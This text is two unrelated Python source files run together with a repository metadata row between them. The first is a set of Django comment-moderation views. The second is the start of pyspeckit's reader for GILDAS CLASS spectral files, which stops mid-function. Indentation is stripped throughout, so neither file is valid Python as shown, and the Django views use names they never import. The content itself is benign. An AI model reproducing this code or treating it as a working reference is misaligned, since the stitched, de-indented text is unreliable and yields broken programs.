from utils import next_redirect, confirmation_view
from django.core.paginator import Paginator, InvalidPage
from django.http import Http404
from django.contrib import comments
from django.contrib.comments import signals
#@login_required
def flag(request, comment_id, next=None):
"""
Flags a comment. Confirmation on GET, action on POST.
Templates: `comments/flag.html`,
Context:
comment
the flagged `comments.comment` object
"""
comment = get_object_or_404(comments.get_model(), pk=comment_id, site__pk=settings.SITE_ID)
# Flag on POST
if request.method == 'POST':
flag, created = comments.models.CommentFlag.objects.get_or_create(
comment = comment,
user = request.user,
flag = comments.models.CommentFlag.SUGGEST_REMOVAL
)
signals.comment_was_flagged.send(
sender = comment.__class__,
comment = comment,
flag = flag,
created = created,
request = request,
)
return next_redirect(request.POST.copy(), next, flag_done, c=comment.pk)
# Render a form on GET
else:
return render_to_response('comments/flag.html',
{'comment': comment, "next": next},
template.RequestContext(request)
)
flag = login_required(flag)
#@permission_required("comments.delete_comment")
def delete(request, comment_id, next=None):
"""
Deletes a comment. Confirmation on GET, action on POST. Requires the "can
moderate comments" permission.
Templates: `comments/delete.html`,
Context:
comment
the flagged `comments.comment` object
"""
comment = get_object_or_404(comments.get_model(), pk=comment_id, site__pk=settings.SITE_ID)
# Delete on POST
if request.method == 'POST':
# Flag the comment as deleted instead of actually deleting it.
flag, created = comments.models.CommentFlag.objects.get_or_create(
comment = comment,
user = request.user,
flag = comments.models.CommentFlag.MODERATOR_DELETION
)
comment.is_removed = True
comment.save()
signals.comment_was_flagged.send(
sender = comment.__class__,
comment = comment,
flag = flag,
created = created,
request = request,
)
return next_redirect(request.POST.copy(), next, delete_done, c=comment.pk)
# Render a form on GET
else:
return render_to_response('comments/delete.html',
{'comment': comment, "next": next},
template.RequestContext(request)
)
delete = permission_required("comments.can_moderate")(delete)
#@permission_required("comments.can_moderate")
def approve(request, comment_id, next=None):
"""
Approve a comment (that is, mark it as public and non-removed). Confirmation
on GET, action on POST. Requires the "can moderate comments" permission.
Templates: `comments/approve.html`,
Context:
comment
the `comments.comment` object for approval
"""
comment = get_object_or_404(comments.get_model(), pk=comment_id, site__pk=settings.SITE_ID)
# Delete on POST
if request.method == 'POST':
# Flag the comment as approved.
flag, created = comments.models.CommentFlag.objects.get_or_create(
comment = comment,
user = request.user,
flag = comments.models.CommentFlag.MODERATOR_APPROVAL,
)
comment.is_removed = False
comment.is_public = True
comment.save()
signals.comment_was_flagged.send(
sender = comment.__class__,
comment = comment,
flag = flag,
created = created,
request = request,
)
return next_redirect(request.POST.copy(), next, approve_done, c=comment.pk)
# Render a form on GET
else:
return render_to_response('comments/approve.html',
{'comment': comment, "next": next},
template.RequestContext(request)
)
approve = permission_required("comments.can_moderate")(approve)
#@permission_required("comments.can_moderate")
def moderation_queue(request):
"""
Displays a list of unapproved comments to be approved.
Templates: `comments/moderation_queue.html`
Context:
comments
Comments to be approved (paginated).
empty
Is the comment list empty?
is_paginated
Is there more than one page?
results_per_page
Number of comments per page
has_next
Is there a next page?
has_previous
Is there a previous page?
page
The current page number
next
The next page number
pages
Number of pages
hits
Total number of comments
page_range
Range of page numbers
"""
qs = comments.get_model().objects.filter(is_public=False, is_removed=False)
paginator = Paginator(qs, 100)
try:
page = int(request.GET.get("page", 1))
except ValueError:
raise Http404
try:
comments_per_page = paginator.page(page)
except InvalidPage:
raise Http404
return render_to_response("comments/moderation_queue.html", {
'comments' : comments_per_page.object_list,
'empty' : page == 1 and paginator.count == 0,
'is_paginated': paginator.num_pages > 1,
'results_per_page': 100,
'has_next': comments_per_page.has_next(),
'has_previous': comments_per_page.has_previous(),
'page': page,
'next': page + 1,
'previous': page - 1,
'pages': paginator.num_pages,
'hits' : paginator.count,
'page_range' : paginator.page_range
}, context_instance=template.RequestContext(request))
moderation_queue = permission_required("comments.can_moderate")(moderation_queue)
flag_done = confirmation_view(
template = "comments/flagged.html",
doc = 'Displays a "comment was flagged" success page.'
)
delete_done = confirmation_view(
template = "comments/deleted.html",
doc = 'Displays a "comment was deleted" success page.'
)
approve_done = confirmation_view(
template = "comments/approved.html",
doc = 'Displays a "comment was approved" success page.'
)
| apache-2.0 |
mikelum/pyspeckit | pyspeckit/spectrum/readers/read_class.py | 1 | 67070 | """
------------------------
GILDAS CLASS file reader
------------------------
Read a CLASS file into an :class:`pyspeckit.spectrum.ObsBlock`
"""
from __future__ import print_function
from astropy.extern.six.moves import xrange
from astropy.extern.six import iteritems
try:
import astropy.io.fits as pyfits
except ImportError:
import pyfits
import numpy
import numpy as np
from numpy import pi
from astropy import log
# from astropy.time import Time
from astropy import units as u
import pyspeckit
import sys
import re
try:
from astropy.utils.console import ProgressBar
except ImportError:
ProgressBar = lambda x: None
ProgressBar.update = lambda x: None
import struct
import time
# 'range' is needed as a keyword
irange = range
def print_timing(func):
"""
Prints execution time of decorated function.
Included here because CLASS files can take a little while to read;
this should probably be replaced with a progressbar
"""
def wrapper(*arg,**kwargs):
t1 = time.time()
res = func(*arg,**kwargs)
t2 = time.time()
log.info('%s took %0.5g s' % (func.func_name, (t2-t1)))
return res
wrapper.__doc__ = func.__doc__
return wrapper
""" Specification: http://iram.fr/IRAMFR/GILDAS/doc/html/class-html/node58.html """
filetype_dict = {'1A ':'Multiple_IEEE','1 ':'Multiple_Vax','1B ':'Multiple_EEEI',
'2A ':'v2','2 ':'v2','2B ':'v2',
'9A ':'Single_IEEE','9 ':'Single_Vax','9B ':'Single_EEEI'}
fileversion_dict = {'1A ':'v1',
'2A ':'v2'}
record_lengths = {'1A': 512,
'2A': 1024*4}
header_id_numbers = {0: 'USER CODE',
-1: 'COMMENT',
-2: 'GENERAL',
-3: 'POSITION',
-4: 'SPECTRO',
-5: 'BASELINE',
-6: 'HISTORY',
# -8: 'SWITCH',
-10: 'DRIFT',
-14: 'CALIBRATION',
}
header_id_lengths = {-2: 9, # may really be 10?
-3: 17,
-4: 17,
-5: None, # variable length
-6: 3, # variable length
-14: 25,
}
# from packages/classic/lib/classic_mod.f90
filedescv2_nw1=14
"""
GENERAL
integer(kind=obsnum_length) :: num ! [ ] Observation number
integer(kind=4) :: ver ! [ ] Version number
integer(kind=4) :: teles(3) ! [ ] Telescope name
integer(kind=4) :: dobs ! [MJD-60549] Date of observation
integer(kind=4) :: dred ! [MJD-60549] Date of reduction
integer(kind=4) :: typec ! [ code] Type of coordinates
integer(kind=4) :: kind ! [ code] Type of data
integer(kind=4) :: qual ! [ code] Quality of data
integer(kind=4) :: subscan ! [ ] Subscan number
integer(kind=obsnum_length) :: scan ! [ ] Scan number
! Written in the entry
real(kind=8) :: ut ! 1-2 [ rad] UT of observation
real(kind=8) :: st ! 3-4 [ rad] LST of observation
real(kind=4) :: az ! 5 [ rad] Azimuth
real(kind=4) :: el ! 6 [ rad] Elevation
real(kind=4) :: tau ! 7 [neper] Opacity
real(kind=4) :: tsys ! 8 [ K] System temperature
real(kind=4) :: time ! 9 [ s] Integration time
! Not in this section in file
integer(kind=4) :: xunit ! [ code] X unit (if X coordinates section is present)
! NOT in data ---
character(len=12) :: cdobs ! [string] Duplicate of dobs
character(len=12) :: cdred ! [string] Duplicate of dred
"""
keys_lengths = {
'unknown': [
( 'NUM' ,1,'int32'), # Observation number
( 'VER' ,1,'int32'), # Version number
( 'TELES' ,3,'|S12') , # Telescope name
( 'DOBS' ,1,'int32'), # Date of observation
( 'DRED' ,1,'int32'), # Date of reduction
( 'TYPEC' ,1,'int32'), # Type of coordinates
( 'KIND' ,1,'int32'), # Type of data
( 'QUAL' ,1,'int32'), # Quality of data
( 'SCAN' ,1,'int32'), # Scan number
( 'SUBSCAN' ,1,'int32'), # Subscan number
],
'COMMENT': [ # -1
('LTEXT',1,'int32'), # integer(kind=4) :: ltext ! Length of comment
('CTEXT',1024/4,'|S1024'), # character ctext*1024 ! Comment string
],
'GENERAL': [ # -2
( 'UT' ,2,'float64'), # rad UT of observation
( 'ST' ,2,'float64'), # rad LST of observation
( 'AZ' ,1,'float32'), # rad Azimuth
( 'EL' ,1,'float32'), # rad Elevation
( 'TAU' ,1,'float32'), # neper Opacity
( 'TSYS' ,1,'float32'), # K System temperature
( 'TIME' ,1,'float32'), # s Integration time
# XUNIT should not be there?
#( 'XUNIT' ,1,'int32'), # code X unit (if xcoord_sec is present)
] ,
'POSITION': [ # -3
('SOURC',3,'|S12') , # [ ] Source name
('EPOCH',1,'float32'), # [ ] Epoch of coordinates
('LAM' ,2,'float64'), #[rad] Lambda
('BET' ,2,'float64'), #[rad] Beta
('LAMOF',1,'float32'), # [rad] Offset in Lambda
('BETOF',1,'float32'), # [rad] Offset in Beta
('PROJ' ,1,'int32') , # [rad] Projection system
('SL0P' ,1,'float64'), # lambda of descriptive system # MAY NOT EXIST IN OLD CLASS
('SB0P' ,1,'float64'), # beta of descriptive system # MAY NOT EXIST IN OLD CLASS
('SK0P' ,1,'float64'), # angle of descriptive system # MAY NOT EXIST IN OLD CLASS
],
'SPECTRO': [ # -4
#('align' ,1,'int32'), # [ ] Alignment padding
('LINE' ,3,'|S12'), # [ ] Line name
('RESTF' ,2,'float64'), # [ MHz] Rest frequency
('NCHAN' ,1,'int32'), # [ ] Number of channels
('RCHAN' ,1,'float32'), # [ ] Reference channels
('FRES' ,1,'float32'), # [ MHz] Frequency resolution
('FOFF' ,1,'float32'), # [ MHz] Frequency offset
('VRES' ,1,'float32'), # [km/s] Velocity resolution
('VOFF' ,1,'float32'), # [km/s] Velocity at reference channel
('BAD' ,1,'float32'), # [ ] Blanking value
#('ALIGN_1',1,'int32'), # [ ] Alignment padding
('IMAGE' ,2,'float64'), # [ MHz] Image frequency
#('ALIGN_2',1,'int32'), # [ ] Alignment padding
('VTYPE' ,1,'int32'), # [code] Type of velocity
('DOPPLER',2,'float64'), # [ ] Doppler factor = -V/c (CLASS convention)
],
'CALIBRATION': [ # -14
('ALIGN',1,'int32'), # BUFFER (it's a zero - it is not declared in the docs!!!!)
('BEEFF',1,'float32'), # [ ] Beam efficiency
('FOEFF',1,'float32'), # [ ] Forward efficiency
('GAINI',1,'float32'), # [ ] Image/Signal gain ratio
('H2OMM',1,'float32'), # [ mm] Water vapor content
('PAMB',1,'float32'), # [ hPa] Ambient pressure
('TAMB',1,'float32'), # [ K] Ambient temperature
('TATMS',1,'float32'), # [ K] Atmosphere temp. in signal band
('TCHOP',1,'float32'), # [ K] Chopper temperature
('TCOLD',1,'float32'), # [ K] Cold load temperature
('TAUS',1,'float32'), # [neper] Opacity in signal band
('TAUI',1,'float32'), # [neper] Opacity in image band
('TATMI',1,'float32'), # [ K] Atmosphere temp. in image band
('TREC',1,'float32'), # [ K] Receiver temperature
('CMODE',1,'int32'), # [ code] Calibration mode
('ATFAC',1,'float32'), # [ ] Applied calibration factor
('ALTI',1,'float32'), # [ m] Site elevation
('COUNT',3,'3float32'), # [count] Power of Atm., Chopp., Cold
('LCALOF',1,'float32'), # [ rad] Longitude offset for sky measurement
('BCALOF',1,'float32'), # [ rad] Latitude offset for sky measurement
('GEOLONG',1,'float64'), # [ rad] Geographic longitude of observatory # MAY NOT EXIST IN OLD CLASS
('GEOLAT',1,'float64'), # [ rad] Geographic latitude of observatory # MAY NOT EXIST IN OLD CLASS
],
'BASELINE':[
('DEG',1,'int32'), #! [ ] Degree of last baseline
('SIGFI',1,'float32'), #! [Int. unit] Sigma
('AIRE',1,'float32'), #! [Int. unit] Area under windows
('NWIND',1,'int32'), #! [ ] Number of line windows
# WARNING: These should probably have 'n', the second digit, = NWIND
# The docs are really unclear about this, they say "W1(MWIND)"
('W1MWIND',1,'float32'), #! [km/s] Lower limits of windows
('W2MWIND',1,'float32'), #! [km/s] Upper limits of windows
('SINUS',3,'float32'), #![] Sinus baseline results
],
'DRIFT':[ # 16?
('FREQ',1,'float64') , #! [ MHz] Rest frequency real(kind=8) ::
('WIDTH',1,'float32'), #! [ MHz] Bandwidth real(kind=4) ::
('NPOIN',1,'int32') , #! [ ] Number of data points integer(kind=4) ::
('RPOIN',1,'float32'), #! [ ] Reference point real(kind=4) ::
('TREF',1,'float32') , #! [ ?] Time at reference real(kind=4) ::
('AREF',1,'float32') , #! [ rad] Angular offset at ref. real(kind=4) ::
('APOS',1,'float32') , #! [ rad] Position angle of drift real(kind=4) ::
('TRES',1,'float32') , #! [ ?] Time resolution real(kind=4) ::
('ARES',1,'float32') , #! [ rad] Angular resolution real(kind=4) ::
('BAD',1,'float32') , #! [ ] Blanking value real(kind=4) ::
('CTYPE',1,'int32') , #! [code] Type of offsets integer(kind=4) ::
('CIMAG',1,'float64'), #! [ MHz] Image frequency real(kind=8) ::
('COLLA',1,'float32'), #! [ ?] Collimation error Az real(kind=4) ::
('COLLE',1,'float32'), #! [ ?] Collimation error El real(kind=4) ::
],
}
def _read_bytes(f, n):
'''Read the next `n` bytes (from idlsave)'''
return f.read(n)
"""
Warning: UNCLEAR what endianness should be!
Numpy seemed to get it right, and I think numpy assumes NATIVE endianness
"""
def _read_byte(f):
'''Read a single byte (from idlsave)'''
return numpy.uint8(struct.unpack('=B', f.read(4)[:1])[0])
def _read_int16(f):
'''Read a signed 16-bit integer (from idlsave)'''
return numpy.int16(struct.unpack('=h', f.read(4)[2:4])[0])
def _read_int32(f):
'''Read a signed 32-bit integer (from idlsave)'''
return numpy.int32(struct.unpack('=i', f.read(4))[0])
def _read_int64(f):
'''Read a signed 64-bit integer '''
return numpy.int64(struct.unpack('=q', f.read(8))[0])
def _read_float32(f):
'''Read a 32-bit float (from idlsave)'''
return numpy.float32(struct.unpack('=f', f.read(4))[0])
def _align_32(f):
'''Align to the next 32-bit position in a file (from idlsave)'''
pos = f.tell()
if pos % 4 != 0:
f.seek(pos + 4 - pos % 4)
return
def _read_word(f,length):
if length > 0:
chars = _read_bytes(f, length)
_align_32(f)
else:
chars = None
return chars
def _read_int(f):
return struct.unpack('i',f.read(4))
def is_ascii(s):
try:
s.decode('ascii')
return True
except UnicodeDecodeError:
return False
except UnicodeEncodeError:
return False
def is_all_null(s):
return all(x=='\x00' for x in s)
"""
from clic_file.f90: v1, v2
integer(kind=4) :: bloc ! 1 : observation address [records] integer(kind=8) :: bloc ! 1- 2: observation address [records] integer(kind=4) :: bloc ! 1 : block read from index
integer(kind=4) :: num ! 2 : observation number integer(kind=4) :: word ! 3 : address offset [4-bytes] integer(kind=4) :: num ! 2 : number read
integer(kind=4) :: ver ! 3 : observation version integer(kind=4) :: ver ! 4 : observation version integer(kind=4) :: ver ! 3 : version read from index
integer(kind=4) :: sourc(3) ! 4- 6: source name integer(kind=8) :: num ! 5- 6: observation number character(len=12) :: csour ! 4- 6: source read from index
integer(kind=4) :: line(3) ! 7- 9: line name integer(kind=4) :: sourc(3) ! 7- 9: source name character(len=12) :: cline ! 7- 9: line read from index
integer(kind=4) :: teles(3) ! 10-12: telescope name integer(kind=4) :: line(3) ! 10-12: line name character(len=12) :: ctele ! 10-12: telescope read from index
integer(kind=4) :: dobs ! 13 : observation date [class_date] integer(kind=4) :: teles(3) ! 13-15: telescope name integer(kind=4) :: dobs ! 13 : date obs. read from index
integer(kind=4) :: dred ! 14 : reduction date [class_date] integer(kind=4) :: dobs ! 16 : observation date [class_date] integer(kind=4) :: dred ! 14 : date red. read from index
real(kind=4) :: off1 ! 15 : lambda offset [radian] integer(kind=4) :: dred ! 17 : reduction date [class_date] real(kind=4) :: off1 ! 15 : read offset 1
real(kind=4) :: off2 ! 16 : beta offset [radian] real(kind=4) :: off1 ! 18 : lambda offset [radian] real(kind=4) :: off2 ! 16 : read offset 2
integer(kind=4) :: typec ! 17 : coordinates types real(kind=4) :: off2 ! 19 : beta offset [radian] integer(kind=4) :: type ! 17 : type of read offsets
integer(kind=4) :: kind ! 18 : data kind integer(kind=4) :: typec ! 20 : coordinates types integer(kind=4) :: kind ! 18 : type of observation
integer(kind=4) :: qual ! 19 : data quality integer(kind=4) :: kind ! 21 : data kind integer(kind=4) :: qual ! 19 : Quality read from index
integer(kind=4) :: scan ! 20 : scan number integer(kind=4) :: qual ! 22 : data quality integer(kind=4) :: scan ! 20 : Scan number read from index
integer(kind=4) :: proc ! 21 : procedure type integer(kind=4) :: scan ! 23 : scan number real(kind=4) :: posa ! 21 : Position angle
integer(kind=4) :: itype ! 22 : observation type integer(kind=4) :: proc ! 24 : procedure type integer(kind=4) :: subscan ! 22 : Subscan number
real(kind=4) :: houra ! 23 : hour angle [radian] integer(kind=4) :: itype ! 25 : observation type integer(kind=4) :: pad(10) ! 23-32: Pad to 32 words
integer(kind=4) :: project ! 24 : project name real(kind=4) :: houra ! 26 : hour angle [radian]
integer(kind=4) :: pad1 ! 25 : unused word integer(kind=4) :: project(2) ! 27 : project name
integer(kind=4) :: bpc ! 26 : baseline bandpass cal status integer(kind=4) :: bpc ! 29 : baseline bandpass cal status
integer(kind=4) :: ic ! 27 : instrumental cal status integer(kind=4) :: ic ! 30 : instrumental cal status
integer(kind=4) :: recei ! 28 : receiver number integer(kind=4) :: recei ! 31 : receiver number
real(kind=4) :: ut ! 29 : UT [s] real(kind=4) :: ut ! 32 : UT [s]
integer(kind=4) :: pad2(3) ! 30-32: padding to 32 4-bytes word
equivalently
integer(kind=obsnum_length) :: num ! [ ] Observation number
integer(kind=4) :: ver ! [ ] Version number
integer(kind=4) :: teles(3) ! [ ] Telescope name
integer(kind=4) :: dobs ! [MJD-60549] Date of observation
integer(kind=4) :: dred ! [MJD-60549] Date of reduction
integer(kind=4) :: typec ! [ code] Type of coordinates
integer(kind=4) :: kind ! [ code] Type of data
integer(kind=4) :: qual ! [ code] Quality of data
integer(kind=4) :: subscan ! [ ] Subscan number
integer(kind=obsnum_length) :: scan ! [ ] Scan number
"""
"""
index.f90:
call conv%read%i8(data(1), indl%bloc, 1) ! bloc
call conv%read%i4(data(3), indl%word, 1) ! word
call conv%read%i8(data(4), indl%num, 1) ! num
call conv%read%i4(data(6), indl%ver, 1) ! ver
call conv%read%cc(data(7), indl%csour, 3) ! csour
call conv%read%cc(data(10),indl%cline, 3) ! cline
call conv%read%cc(data(13),indl%ctele, 3) ! ctele
call conv%read%i4(data(16),indl%dobs, 1) ! dobs
call conv%read%i4(data(17),indl%dred, 1) ! dred
call conv%read%r4(data(18),indl%off1, 1) ! off1
call conv%read%r4(data(19),indl%off2, 1) ! off2
call conv%read%i4(data(20),indl%type, 1) ! type
call conv%read%i4(data(21),indl%kind, 1) ! kind
call conv%read%i4(data(22),indl%qual, 1) ! qual
call conv%read%r4(data(23),indl%posa, 1) ! posa
call conv%read%i8(data(24),indl%scan, 1) ! scan
call conv%read%i4(data(26),indl%subscan,1) ! subscan
if (isv3) then
call conv%read%r8(data(27),indl%ut, 1) ! ut
else
"""
def _read_indices(f, file_description):
#if file_description['version'] in (1,2):
# extension_positions = (file_description['aex']-1)*file_description['reclen']*4
# all_indices = {extension:
# [_read_index(f,
# filetype=file_description['version'],
# entry=ii,
# #position=position,
# )
# for ii in range(file_description['lex1'])]
# for extension,position in enumerate(extension_positions)
# if position > 0
# }
#elif file_description['version'] == 1:
extension_positions = ((file_description['aex'].astype('int64')-1)
*file_description['reclen']*4)
all_indices = [_read_index(f,
filetype=file_description['version'],
# 1-indexed files
entry_number=ii+1,
file_description=file_description,
)
for ii in range(file_description['xnext']-1)]
#else:
# raise ValueError("Invalid file version {0}".format(file_description['version']))
return all_indices
def _find_index(entry_number, file_description, return_position=False):
if file_description['gex'] == 10:
kex=(entry_number-1)/file_description['lex1'] + 1
else:
# exponential growth:
#kex = gi8_dicho(file_description['nex'], file_description['lexn'], entry_number) - 1
kex = len([xx for xx in file_description['lexn'] if xx<entry_number])
ken = entry_number - file_description['lexn'][kex-1]
#! Find ken (relative entry number in the extension, starts from 1)
#ken = entry_num - file%desc%lexn(kex-1)
kb = ((ken-1)*file_description['lind'])/file_description['reclen']
#kb = ((ken-1)*file%desc%lind)/file%desc%reclen ! In the extension, the
# ! relative record position (as an offset, starts from 0) where the
# ! Entry Index starts. NB: there can be a non-integer number of Entry
# ! Indexes per record
# Subtract 1: 'aex' is 1-indexed
kbl = (file_description['aex'][kex-1]+kb)-1
# kbl = file%desc%aex(kex)+kb ! The absolute record number where the Entry Index goes
k = ((ken-1)*file_description['lind']) % file_description['reclen']
#k = mod((ken-1)*file%desc%lind,file%desc%reclen)+1 ! = in the record, the
# ! first word of the Entry Index of the entry number 'entry_num'
if return_position:
return (kbl*file_description['reclen']+k)*4
else:
return kbl,k
def _read_index(f, filetype='v1', DEBUG=False, clic=False, position=None,
entry_number=None, file_description=None):
if position is not None:
f.seek(position)
if entry_number is not None:
indpos = _find_index(entry_number, file_description, return_position=True)
f.seek(indpos)
x0 = f.tell()
if filetype in ('1A ','v1', 1):
log.debug('Index filetype 1A')
index = {
"XBLOC":_read_int32(f),
"XNUM":_read_int32(f),
"XVER":_read_int32(f),
"XSOURC":_read_word(f,12),
"XLINE":_read_word(f,12),
"XTEL":_read_word(f,12),
"XDOBS":_read_int32(f),
"XDRED":_read_int32(f),
"XOFF1":_read_float32(f),# first offset (real, radians)
"XOFF2":_read_float32(f),# second offset (real, radians)
"XTYPE":_read_int32(f),# coordinate system ('EQ'', 'GA', 'HO')
"XKIND":_read_int32(f),# Kind of observation (0: spectral, 1: continuum, )
"XQUAL":_read_int32(f),# Quality (0-9)
"XSCAN":_read_int32(f),# Scan number
}
index['BLOC'] = index['XBLOC'] # v2 compatibility
index['WORD'] = 1 # v2 compatibility
index['SOURC'] = index['CSOUR'] = index['XSOURC']
index['DOBS'] = index['CDOBS'] = index['XDOBS']
index['CTELE'] = index['XTEL']
index['LINE'] = index['XLINE']
index['OFF1'] = index['XOFF1']
index['OFF2'] = index['XOFF2']
index['QUAL'] = index['XQUAL']
index['SCAN'] = index['XSCAN']
index['KIND'] = index['XKIND']
if clic: # use header set up in clic
nextchunk = {
"XPROC":_read_int32(f),# "procedure type"
"XITYPE":_read_int32(f),#
"XHOURANG":_read_float32(f),#
"XPROJNAME":_read_int32(f),#
"XPAD1":_read_int32(f),
"XBPC" :_read_int32(f),
"XIC" :_read_int32(f),
"XRECEI" :_read_int32(f),
"XUT":_read_float32(f),
"XPAD2":numpy.fromfile(f,count=3,dtype='int32') # BLANK is NOT ALLOWED!!! It is a special KW
}
else:
nextchunk = {"XPOSA":_read_float32(f),
"XSUBSCAN":_read_int32(f),
'XPAD2': numpy.fromfile(f,count=10,dtype='int32'),
}
nextchunk['SUBSCAN'] = nextchunk['XSUBSCAN']
nextchunk['POSA'] = nextchunk['XPOSA']
index.update(nextchunk)
if (f.tell() - x0 != 128):
missed_bits = (f.tell()-x0)
X = f.read(128-missed_bits)
if DEBUG: print("read_index missed %i bits: %s" % (128-missed_bits,X))
#raise IndexError("read_index did not successfully read 128 bytes at %i. Read %i bytes." % (x0,f.tell()-x0))
if any(not is_ascii(index[x]) for x in ('XSOURC','XLINE','XTEL')):
raise ValueError("Invalid index read from {0}.".format(x0))
elif filetype in ('2A ','v2', 2):
log.debug('Index filetype 2A')
index = {
"BLOC" : _read_int64(f) , #(data(1), 1) ! bloc
"WORD" : _read_int32(f) , #(data(3), 1) ! word
"NUM" : _read_int64(f) , #(data(4), 1) ! num
"VER" : _read_int32(f) , #(data(6), 1) ! ver
"CSOUR" : _read_word(f,12), #(data(7), 3) ! csour
"CLINE" : _read_word(f,12), #(data(10), 3) ! cline
"CTELE" : _read_word(f,12), #(data(13), 3) ! ctele
"DOBS" : _read_int32(f) , #(data(16), 1) ! dobs
"DRED" : _read_int32(f) , #(data(17), 1) ! dred
"OFF1" : _read_float32(f), #(data(18), 1) ! off1
"OFF2" : _read_float32(f), #(data(19), 1) ! off2
"TYPE" : _read_int32(f) , #(data(20), 1) ! type
"KIND" : _read_int32(f) , #(data(21), 1) ! kind
"QUAL" : _read_int32(f) , #(data(22), 1) ! qual
"POSA" : _read_float32(f), #(data(23), 1) ! posa
"SCAN" : _read_int64(f) , #(data(24), 1) ! scan
"SUBSCAN": _read_int32(f) , #(data(26), 1) ! subscan
}
#last24bits = f.read(24)
#log.debug("Read 24 bits: '{0}'".format(last24bits))
if any((is_all_null(index[x]) or not is_ascii(index[x]))
for x in ('CSOUR','CLINE','CTELE')):
raise ValueError("Invalid index read from {0}.".format(x0))
index['SOURC'] = index['XSOURC'] = index['CSOUR']
index['LINE'] = index['XLINE'] = index['CLINE']
index['XKIND'] = index['KIND']
try:
index['DOBS'] = index['XDOBS'] = index['CDOBS']
except KeyError:
index['CDOBS'] = index['XDOBS'] = index['DOBS']
else:
raise NotImplementedError("Filetype {0} not implemented.".format(filetype))
# from kernel/lib/gsys/date.f90: gag_julda
class_dobs = index['DOBS']
index['DOBS'] = ((class_dobs + 365*2025)/365.2425 + 1)
# SLOW
#index['DATEOBS'] = Time(index['DOBS'], format='jyear')
#index['DATEOBSS'] = index['DATEOBS'].iso
log.debug("Indexing finished at {0}".format(f.tell()))
return index
def _read_header(f, type=0, position=None):
"""
Read a header entry from a CLASS file
(helper function)
"""
if position is not None:
f.seek(position)
if type in keys_lengths:
hdrsec = [(x[0],numpy.fromfile(f,count=1,dtype=x[2])[0])
for x in keys_lengths[type]]
return dict(hdrsec)
else:
return {}
raise ValueError("Unrecognized type {0}".format(type))
def _read_first_record(f):
f.seek(0)
filetype = f.read(4)
if fileversion_dict[filetype] == 'v1':
return _read_first_record_v1(f)
else:
return _read_first_record_v2(f)
def _read_first_record_v1(f, record_length_words=128):
r"""
Position & Parameter & Fortran Kind & Purpose \\
\hline
1 & {\tt code} & Character*4 & File code \\
2 & {\tt next} & Integer*4 & Next free record \\
3 & {\tt lex} & Integer*4 & Length of first extension (number of entries) \\
4 & {\tt nex} & Integer*4 & Number of extensions \\
5 & {\tt xnext} & Integer*4 & Next available entry number \\
6:2*{\tt reclen} & {\tt ex(:)} & Integer*4 & Array of extension addresses
from classic_mod.f90:
integer(kind=4) :: code ! 1 File code
integer(kind=4) :: next ! 2 Next free record
integer(kind=4) :: lex ! 3 Extension length (number of entries)
integer(kind=4) :: nex ! 4 Number of extensions
integer(kind=4) :: xnext ! 5 Next available entry number
integer(kind=4) :: aex(mex_v1) ! 6:256 Extension addresses
from old (<dec2013) class, file.f90:
read(ilun,rec=1,err=11,iostat=ier) ibx%code,ibx%next, &
& ibx%ilex,ibx%imex,ibx%xnext
also uses filedesc_v1tov2 from classic/lib/file.f90
"""
# OLD NOTES
# hdr = header
# hdr.update(obshead) # re-overwrite things
# hdr.update({'OBSNUM':obsnum,'RECNUM':spcount})
# hdr.update({'RA':hdr['LAM']/pi*180,'DEC':hdr['BET']/pi*180})
# hdr.update({'RAoff':hdr['LAMOF']/pi*180,'DECoff':hdr['BETOF']/pi*180})
# hdr.update({'OBJECT':hdr['SOURC'].strip()})
# hdr.update({'BUNIT':'Tastar'})
# hdr.update({'EXPOSURE':hdr['TIME']})
f.seek(0)
file_description = {
'code': f.read(4),
'next': _read_int32(f),
'lex': _read_int32(f),
'nex': _read_int32(f),
'xnext': _read_int32(f),
'gex': 10.,
'vind': 1, # classic_vind_v1 packages/classic/lib/classic_mod.f90
'version': 1,
'nextrec': 3,
'nextword': 1,
'lind': 32, #classic_lind_v1 packages/classic/lib/classic_mod.f90
'kind': 'unknown',
'flags': 0,
}
file_description['reclen'] = record_length_words # should be 128w = 512 bytes
ex = np.fromfile(f, count=(record_length_words*2-5), dtype='int32')
file_description['ex'] = ex[ex!=0]
file_description['nextrec'] = file_description['next'] # this can't be...
file_description['lex1'] = file_description['lex'] # number of entries
file_description['lexn'] = (np.arange(file_description['nex']+1) *
file_description['lex1'])
file_description['nentries'] = np.sum(file_description['lexn'])
file_description['aex'] = file_description['ex'][:file_description['nex']]
#file_description['version'] = fileversion_dict[file_description['code']]
assert f.tell() == 1024
# Something is not quite right with the 'ex' parsing
#assert len(file_description['ex']) == file_description['nex']
return file_description
def _read_first_record_v2(f):
r""" packages/classic/lib/file.f90
Position & Parameter & Fortran Kind & Purpose & Unit \\
\hline
1 & {\tt code} & Character*4 & File code & - \\
2 & {\tt reclen} & Integer*4 & Record length & words \\
3 & {\tt kind} & Integer*4 & File kind & - \\
4 & {\tt vind} & Integer*4 & Index version & - \\
5 & {\tt lind} & Integer*4 & Index length & words \\
6 & {\tt flags} & Integer*4 & Bit flags. \#1: single or multiple, & - \\
& & & \#2-32: provision (0-filled) & \\
\hline
7:8 & {\tt xnext} & Integer*8 & Next available entry number & - \\
9:10 & {\tt nextrec} & Integer*8 & Next record which contains free space & record \\
11 & {\tt nextword} & Integer*4 & Next free word in this record & word \\
\hline
12 & {\tt lex1} & Integer*4 & Length of first extension index & entries \\
13 & {\tt nex} & Integer*4 & Number of extensions & - \\
14 & {\tt gex} & Integer*4 & Extension growth rule & - \\
15:{\tt reclen} & {\tt aex(:)} & Integer*8 & Array of extension addresses & record
"""
f.seek(0)
file_description = {
'code': f.read(4),
'reclen': _read_int32(f),
'kind': _read_int32(f),
'vind': _read_int32(f),
'lind': _read_int32(f),
'flags': _read_int32(f),
'xnext': _read_int64(f),
'nextrec': _read_int64(f),
'nextword': _read_int32(f),
'lex1': _read_int32(f),
'nex': _read_int32(f),
'gex': _read_int32(f),
}
file_description['lexn'] = [0]
if file_description['gex'] == 10:
for ii in range(1, file_description['nex']+1):
file_description['lexn'].append(file_description['lexn'][-1]+file_description['lex1'])
else:
#! Exponential growth. Only growth with mantissa 2.0 is supported
for ii in range(1, file_description['nex']):
# I don't know what the fortran does here!!!
# ahh, maybe 2_8 means int(2, dtype='int64')
nent = int(file_description['lex1'] * 2**(ii-1))
#nent = int(file%desc%lex1,kind=8) * 2_8**(iex-1)
file_description['lexn'].append(file_description['lexn'][-1]+nent)
#file%desc%lexn(iex) = file%desc%lexn(iex-1) + nent
file_description['nentries'] = np.sum(file_description['lexn'])
record_length_words = file_description['reclen']
